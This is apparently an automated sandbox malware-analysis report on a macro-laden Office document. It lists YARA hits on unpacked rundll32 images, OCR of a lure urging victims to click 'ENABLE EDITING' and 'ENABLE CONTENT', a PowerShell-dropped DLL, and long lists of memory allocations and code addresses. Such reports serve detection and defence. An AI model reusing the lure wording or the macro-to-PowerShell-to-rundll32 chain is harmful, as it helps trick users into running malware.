Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: 1 of 1 , Word
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: 1 of 1 , Words:O I ,3 I N@m 13 ;a
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Xts_nmf\P4188qk\U95D.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5633
Source: unknown	Process created: Commandline size = 5537
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5537	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Sfwveevpdqixuom\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D0AC	7_2_1001D0AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1003B353	7_2_1003B353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1003B473	7_2_1003B473
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B773	7_2_1001B773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100357C0	7_2_100357C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B9A5	7_2_1001B9A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100079E0	7_2_100079E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BBE6	7_2_1001BBE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10035BF0	7_2_10035BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10033D2D	7_2_10033D2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BE18	7_2_1001BE18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002FE2A	7_2_1002FE2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C04A	7_2_1001C04A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C28B	7_2_1001C28B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1003628F	7_2_1003628F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C4BD	7_2_1001C4BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C71A	7_2_1001C71A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C986	7_2_1001C986
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CBE3	7_2_1001CBE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CE40	7_2_1001CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C0C6	7_2_0020C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002102C3	7_2_002102C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002142DA	7_2_002142DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208736	7_2_00208736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00214B41	7_2_00214B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00202C63	7_2_00202C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020EE78	7_2_0020EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B41F	7_2_0020B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020568E	7_2_0020568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00213895	7_2_00213895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00207B63	7_2_00207B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020E05A	7_2_0020E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0AF	7_2_0021A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002060B9	7_2_002060B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002080BA	7_2_002080BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002120C5	7_2_002120C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002161B8	7_2_002161B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002062A3	7_2_002062A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020E377	7_2_0020E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212349	7_2_00212349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020839D	7_2_0020839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002163C1	7_2_002163C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002126F5	7_2_002126F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C769	7_2_0020C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00206754	7_2_00206754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021878F	7_2_0021878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002167E9	7_2_002167E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021687F	7_2_0021687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002048BD	7_2_002048BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021889D	7_2_0021889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002088E5	7_2_002088E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002069A0	7_2_002069A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00202A30	7_2_00202A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00204A35	7_2_00204A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020EA4C	7_2_0020EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218ADC	7_2_00218ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212B16	7_2_00212B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00210B68	7_2_00210B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00210D33	7_2_00210D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218D1C	7_2_00218D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00216DB9	7_2_00216DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00206D9F	7_2_00206D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00210F0C	7_2_00210F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208F78	7_2_00208F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218F49	7_2_00218F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B112	7_2_0020B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021511B	7_2_0021511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002131E2	7_2_002131E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002171EF	7_2_002171EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00201280	7_2_00201280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002112E2	7_2_002112E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002173AC	7_2_002173AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021340A	7_2_0021340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020F444	7_2_0020F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020F536	7_2_0020F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020153C	7_2_0020153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00219586	7_2_00219586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002096CD	7_2_002096CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211773	7_2_00211773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B75F	7_2_0020B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002017AC	7_2_002017AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020D7EB	7_2_0020D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020F98C	7_2_0020F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00207998	7_2_00207998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00209A37	7_2_00209A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217A0F	7_2_00217A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00215A61	7_2_00215A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020BB3A	7_2_0020BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205B79	7_2_00205B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00219B45	7_2_00219B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211BDF	7_2_00211BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00201CFA	7_2_00201CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217D03	7_2_00217D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00215D1D	7_2_00215D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217F1F	7_2_00217F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00213FE7	7_2_00213FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00209FDC	7_2_00209FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D0AC	8_2_1001D0AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1003B353	8_2_1003B353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1003B473	8_2_1003B473
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001B773	8_2_1001B773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100357C0	8_2_100357C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001B9A5	8_2_1001B9A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100079E0	8_2_100079E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001BBE6	8_2_1001BBE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10035BF0	8_2_10035BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10033D2D	8_2_10033D2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001BE18	8_2_1001BE18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002FE2A	8_2_1002FE2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001C04A	8_2_1001C04A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001C28B	8_2_1001C28B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1003628F	8_2_1003628F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001C4BD	8_2_1001C4BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001C71A	8_2_1001C71A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001C986	8_2_1001C986
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001CBE3	8_2_1001CBE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001CE40	8_2_1001CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018C0C6	8_2_0018C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001942DA	8_2_001942DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001902C3	8_2_001902C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001963C1	8_2_001963C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00188736	8_2_00188736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00194B41	8_2_00194B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00182C63	8_2_00182C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018EE78	8_2_0018EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018B41F	8_2_0018B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018568E	8_2_0018568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00193895	8_2_00193895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00187B63	8_2_00187B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018E05A	8_2_0018E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001860B9	8_2_001860B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001880BA	8_2_001880BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019A0AF	8_2_0019A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001920C5	8_2_001920C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001961B8	8_2_001961B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001862A3	8_2_001862A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00192349	8_2_00192349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018E377	8_2_0018E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018839D	8_2_0018839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001926F5	8_2_001926F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00186754	8_2_00186754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018C769	8_2_0018C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019878F	8_2_0019878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001967E9	8_2_001967E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019687F	8_2_0019687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019889D	8_2_0019889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001848BD	8_2_001848BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001888E5	8_2_001888E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001869A0	8_2_001869A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00182A30	8_2_00182A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00184A35	8_2_00184A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018EA4C	8_2_0018EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00198ADC	8_2_00198ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00192B16	8_2_00192B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00190B68	8_2_00190B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00198D1C	8_2_00198D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00190D33	8_2_00190D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00186D9F	8_2_00186D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00196DB9	8_2_00196DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00190F0C	8_2_00190F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00198F49	8_2_00198F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00188F78	8_2_00188F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019511B	8_2_0019511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018B112	8_2_0018B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001971EF	8_2_001971EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001931E2	8_2_001931E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00181280	8_2_00181280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001912E2	8_2_001912E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001973AC	8_2_001973AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019340A	8_2_0019340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018F444	8_2_0018F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018153C	8_2_0018153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018F536	8_2_0018F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00199586	8_2_00199586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001896CD	8_2_001896CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018B75F	8_2_0018B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00191773	8_2_00191773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001817AC	8_2_001817AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018D7EB	8_2_0018D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00187998	8_2_00187998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018F98C	8_2_0018F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00197A0F	8_2_00197A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00189A37	8_2_00189A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00195A61	8_2_00195A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018BB3A	8_2_0018BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00199B45	8_2_00199B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00185B79	8_2_00185B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00191BDF	8_2_00191BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00181CFA	8_2_00181CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00195D1D	8_2_00195D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00197D03	8_2_00197D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00197F1F	8_2_00197F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00189FDC	8_2_00189FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00193FE7	8_2_00193FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB41F	9_2_001CB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CEE78	9_2_001CEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2C63	9_2_001C2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D3895	9_2_001D3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C568E	9_2_001C568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D42DA	9_2_001D42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CC0C6	9_2_001CC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D02C3	9_2_001D02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C8736	9_2_001C8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D4B41	9_2_001D4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C7B63	9_2_001C7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D63C1	9_2_001D63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7A0F	9_2_001D7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D340A	9_2_001D340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C4A35	9_2_001C4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C9A37	9_2_001C9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2A30	9_2_001C2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CE05A	9_2_001CE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CEA4C	9_2_001CEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF444	9_2_001CF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D687F	9_2_001D687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5A61	9_2_001D5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D889D	9_2_001D889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C1280	9_2_001C1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C48BD	9_2_001C48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C60B9	9_2_001C60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C80BA	9_2_001C80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA0AF	9_2_001DA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C62A3	9_2_001C62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8ADC	9_2_001D8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C96CD	9_2_001C96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D20C5	9_2_001D20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C1CFA	9_2_001C1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D26F5	9_2_001D26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C88E5	9_2_001C88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D12E2	9_2_001D12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5D1D	9_2_001D5D1D
